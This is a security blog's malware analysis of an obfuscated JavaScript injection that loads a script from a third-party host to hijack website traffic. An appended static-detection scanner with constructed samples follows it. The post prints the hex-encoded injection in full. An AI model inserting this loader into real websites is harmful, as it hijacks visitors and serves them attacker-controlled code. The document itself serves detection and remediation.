Global CyberSecurity

Malicious Injection Redirects Traffic via Parked Domain


Last Updated on 07/14/2023 by OTC

During a recent investigation, our malware remediation team encountered a variant of a common malware injection that has been active since at least 2017. The malware was found hijacking the website's traffic, redirecting visitors via a parked third-party domain to generate ad revenue.

Investigating obfuscated JavaScript

Our investigation revealed the following piece of obfuscated JavaScript which was found injected into random legitimate JavaScript files in the environment.

In most cases, the injection looks something like this:

var div_avada=document.createElement('script');div_avada.setAttribute("type","text/javascript");var all_avada=["\x2F\x2F\x68\x74\x6D\x6C\x35\x2E\x6F\x6E\x6C\x2F\x6E\x61\x76\x2E\x70\x68\x70\x3F","\x72\x61\x6E\x64\x6F\x6D"];var b_avada=all_avada[0]+Math[all_avada[1]]();div_avada.setAttribute("src",b_avada);if (typeof div_avada!="undefined");document.getElementsByTagName("head")[0].appendChild(div_avada);

While the variable names used for the injection will vary from site to site, the end result is the same: the injection loads a script from a third-party server, which can pose significant security risks to website traffic when controlled by one or more bad actors.
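Because the variable names change from site to site, a scan for this injection has to key on its structure instead. The following is an added example, not code from the original article: it statically decodes hex-only string literals and flags files that also create and append a script element. The function names, the sample strings and the placeholder host cdn.example.invalid are assumptions made for illustration.

```javascript
// Added example: static triage for hex-obfuscated script-loader injections.
// The scanned source is treated as text only and is never evaluated.

// Decode \xNN escapes the way a JS engine would, without running the code.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return the decoded value of every string literal that consists only of
// \xNN escapes (four or more in a row).
function findHexLiterals(source) {
  const re = /(["'])((?:\\x[0-9A-Fa-f]{2}){4,})\1/g;
  return Array.from(source.matchAll(re), m => decodeHexEscapes(m[2]));
}

// Flag a file when it builds a script element, appends it to the page, and
// hides a remote URL in a hex-only literal. Variable names are ignored
// because they differ between infected sites.
function scanSource(source) {
  const decoded = findHexLiterals(source);
  const remote = decoded.filter(d => /^(?:https?:)?\/\//i.test(d));
  const hiddenMembers = decoded.filter(d => /^[A-Za-z_$][\w$]*$/.test(d));
  const createsScript = /createElement\(\s*["']script["']\s*\)/.test(source);
  const appendsNode = /appendChild\s*\(/.test(source);
  return { suspicious: createsScript && appendsNode && remote.length > 0, remote, hiddenMembers };
}

// Constructed samples, not taken from a real site; the host is a placeholder.
const toHex = s => Array.from(s, c =>
  "\\x" + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, "0")).join("");
const SAMPLE_INJECTED =
  'function menu(){return 1;}\n' +
  'var d_x=document.createElement("script");d_x.setAttribute("type","text/javascript");' +
  'var a_x=["' + toHex("//cdn.example.invalid/nav.php?") + '","' + toHex("random") + '"];' +
  'var b_x=a_x[0]+Math[a_x[1]]();d_x.setAttribute("src",b_x);' +
  'document.getElementsByTagName("head")[0].appendChild(d_x);';
// A legitimate loader with a readable, same-origin path must not be flagged.
const SAMPLE_CLEAN =
  'var s=document.createElement("script");s.src="/static/app.js";document.head.appendChild(s);';

console.log(scanSource(SAMPLE_INJECTED));
console.log(scanSource(SAMPLE_CLEAN));
```

A hit is a lead for manual review, not a verdict: compare the flagged file against a known-good copy from the theme, plugin or core package before cleaning it.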
